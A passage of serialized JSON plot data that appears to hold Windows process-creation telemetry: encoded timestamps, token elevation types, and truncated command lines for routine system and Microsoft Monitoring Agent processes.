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\",\"dtype\":\"float64\",\"shape\":[1010]},\"TokenElevationType\":[\"NaN\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"NaN\",\"%%1936\",\"%%1936\",\"NaN\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"NaN\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"NaN\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"NaN\",\"%%1936\",\"%%1936\",\"NaN\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"NaN\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"NaN\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"NaN\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\"],\"cmd\":[\"cmdline unknown\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Em...\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Em...\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\DllHost.exe /Processid:{E10F6C...\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Em...\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Em...\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Em...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\"C:\\\\Windows\\\\system32\\\\unlodctr.exe\\\" \\\"cps etw data s...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\c...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\cv...\",\"\\\"C:\\\\Windows\\\\system32\\\\lodctr.exe\\\" \\\"C:\\\\Windows\\\\TEMP\\\\...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c rmdir /s /q C:\\\\Prog...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c WerFault.exe -k -q\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"WerFault.exe  -k -q\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"ChangeE...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"ChangeE...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"C:\\\\Windows\\\\system32\\\\secedit.exe /export /cfg \\\"C:\\\\P...\",\"C:\\\\Windows\\\\system32\\\\secedit.exe /export /mergedpol...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff 